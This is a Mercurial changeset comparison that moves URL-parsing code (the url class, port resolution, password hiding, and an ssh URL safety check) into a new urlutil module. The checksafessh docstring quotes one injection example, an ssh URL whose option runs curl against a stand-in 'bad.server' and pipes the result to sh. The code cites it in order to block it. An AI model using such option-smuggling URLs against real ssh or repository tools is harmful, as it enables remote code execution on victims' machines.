comparison mercurial/utils/urlutil.py @ 46907:ffd3e823a7e5

urlutil: extract `url` related code from `util` into the new module. The new module is a good fit for this code, and gathering it here will make it easier for the pieces to collaborate later. Differential Revision: https://phab.mercurial-scm.org/D10374
author Pierre-Yves David <pierre-yves.david@octobus.net>
date Mon, 12 Apr 2021 03:01:04 +0200
parents 33524c46a092
children 4452cb788404
comparison
equal deleted inserted replaced
46906:33524c46a092 46907:ffd3e823a7e5
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others 3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
4 # 4 #
5 # This software may be used and distributed according to the terms of the 5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version. 6 # GNU General Public License version 2 or any later version.
7 import os 7 import os
8 import re as remod
9 import socket
8 10
9 from ..i18n import _ 11 from ..i18n import _
10 from ..pycompat import ( 12 from ..pycompat import (
11 getattr, 13 getattr,
12 setattr, 14 setattr,
13 ) 15 )
14 from .. import ( 16 from .. import (
17 encoding,
15 error, 18 error,
16 pycompat, 19 pycompat,
17 util, 20 urllibcompat,
18 ) 21 )
22
23
24 if pycompat.TYPE_CHECKING:
25 from typing import (
26 Union,
27 )
28
29 urlreq = urllibcompat.urlreq
30
31
def getport(port):
    # type: (Union[bytes, int]) -> int
    """Resolve ``port`` to a numeric port.

    Anything ``int()`` can convert is returned as that integer. Otherwise
    the value is treated as a service name and resolved through
    socket.getservbyname(); error.Abort is raised when the lookup fails.
    """
    try:
        number = int(port)
    except ValueError:
        # not numeric: fall through to the service-name lookup below
        pass
    else:
        return number

    servicename = pycompat.sysstr(port)
    try:
        return socket.getservbyname(servicename)
    except socket.error:
        message = _(b"no port number associated with service '%s'") % port
        raise error.Abort(message)
51
52
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters left unquoted in user/passwd when serializing
    _safechars = b"!~*'()+"
    # characters left unquoted in path/fragment when serializing
    _safepchars = b"/!~*'()+:\\"
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # type: (bytes, bool, bool) -> None
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = b''
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and b'?' in path:
                path, self.query = path.split(b'?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith(b'//'):
                parts = path[2:].split(b'/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = b'/' + path

            if self.host and b'@' in self.host:
                self.user, self.host = self.host.rsplit(b'@', 1)
                if b':' in self.user:
                    self.user, self.passwd = self.user.split(b':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (
                self.host
                and b':' in self.host
                and not (
                    self.host.startswith(b'[') and self.host.endswith(b']')
                )
            ):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(b':', 1)
                if not self.host:
                    self.host = None

            if (
                self.host
                and self.scheme == b'file'
                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
            ):
                raise error.Abort(
                    _(b'file:// URLs can only refer to localhost')
                )

        self.path = path

        # leave the query string escaped
        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def copy(self):
        """Return a new url object carrying the same parsed components.

        The new object is built from a placeholder string and then every
        public component and private parsing detail is overwritten with
        this object's value.
        """
        u = url(b'temporary useless value')
        u.scheme = self.scheme
        u.user = self.user
        u.passwd = self.passwd
        u.host = self.host
        # the port must be carried over too, otherwise the copy of
        # 'http://host:8080/' would serialize as 'http://host/'
        u.port = self.port
        u.path = self.path
        u.query = self.query
        u.fragment = self.fragment
        u._localpath = self._localpath
        u._hostport = self._hostport
        u._origpath = self._origpath
        return u

    @encoding.strmethod
    def __repr__(self):
        # only components that are set (not None) are listed
        attrs = []
        for a in (
            b'scheme',
            b'user',
            b'passwd',
            b'host',
            b'port',
            b'path',
            b'query',
            b'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            # local paths (and bundle: paths) are emitted without quoting
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            # bracketed (IPv6 literal) hosts are emitted verbatim
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return ``(url, authinfo)`` with credentials split out of the URL.

        ``url`` is this URL serialized without user and password. ``authinfo``
        is None when no user is set, otherwise the tuple
        ``(None, (url, host), user, passwd or b'')``.
        """
        user, passwd = self.user, self.passwd
        try:
            # temporarily drop the credentials so bytes(self) omits them
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self):
        """Return True for remote URLs and for absolute local paths."""
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self):
        # type: () -> bytes
        """Return the filesystem path for file: and bundle: URLs.

        For any other scheme (or no scheme) the string originally passed to
        the constructor is returned unchanged.
        """
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )
396
397
def hasscheme(path):
    # type: (bytes) -> bool
    """Tell whether parsing ``path`` as a url yields a non-empty scheme."""
    parsed = url(path)
    return bool(parsed.scheme)  # cast to help pytype
401
402
def hasdriveletter(path):
    # type: (bytes) -> bool
    """Tell whether ``path`` starts with a letter followed by a colon.

    Falsy input (empty bytes, None) yields False.
    """
    if not path:
        return False
    # slices rather than indexing, so one-byte paths do not raise
    letter, colon = path[0:1], path[1:2]
    return colon == b':' and letter.isalpha()
406
407
def urllocalpath(path):
    # type: (bytes) -> bytes
    """Return the local path of ``path``, parsed without query/fragment
    splitting."""
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
411
412
def checksafessh(path):
    # type: (bytes) -> None
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    ssh treats a first item starting with '-' as an option, e.g.
    ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. Such urls are
    rejected outright so they can never reach ssh.

    Raises an error.Abort when the url is unsafe.
    """
    # unquote first so percent-encoded dashes are caught as well
    path = urlreq.unquote(path)
    unsafeprefixes = (b'ssh://-', b'svn+ssh://-')
    if path.startswith(unsafeprefixes):
        shown = pycompat.bytestr(path)
        raise error.Abort(_(b'potentially unsafe url: %r') % (shown,))
429
430
def hidepassword(u):
    # type: (bytes) -> bytes
    '''hide user credential in a url string'''
    parsed = url(u)
    # a missing or empty password is left untouched
    if parsed.passwd:
        parsed.passwd = b'***'
    return bytes(parsed)
438
439
def removeauth(u):
    # type: (bytes) -> bytes
    '''remove all authentication information from a url string'''
    parsed = url(u)
    parsed.user = None
    parsed.passwd = None
    return bytes(parsed)
19 446
20 447
21 class paths(dict): 448 class paths(dict):
22 """Represents a collection of paths and their configs. 449 """Represents a collection of paths and their configs.
23 450
101 return register 528 return register
102 529
103 530
104 @pathsuboption(b'pushurl', b'pushloc') 531 @pathsuboption(b'pushurl', b'pushloc')
105 def pushurlpathoption(ui, path, value): 532 def pushurlpathoption(ui, path, value):
106 u = util.url(value) 533 u = url(value)
107 # Actually require a URL. 534 # Actually require a URL.
108 if not u.scheme: 535 if not u.scheme:
109 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) 536 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
110 return None 537 return None
111 538
146 """ 573 """
147 if not rawloc: 574 if not rawloc:
148 raise ValueError(b'rawloc must be defined') 575 raise ValueError(b'rawloc must be defined')
149 576
150 # Locations may define branches via syntax <base>#<branch>. 577 # Locations may define branches via syntax <base>#<branch>.
151 u = util.url(rawloc) 578 u = url(rawloc)
152 branch = None 579 branch = None
153 if u.fragment: 580 if u.fragment:
154 branch = u.fragment 581 branch = u.fragment
155 u.fragment = None 582 u.fragment = None
156 583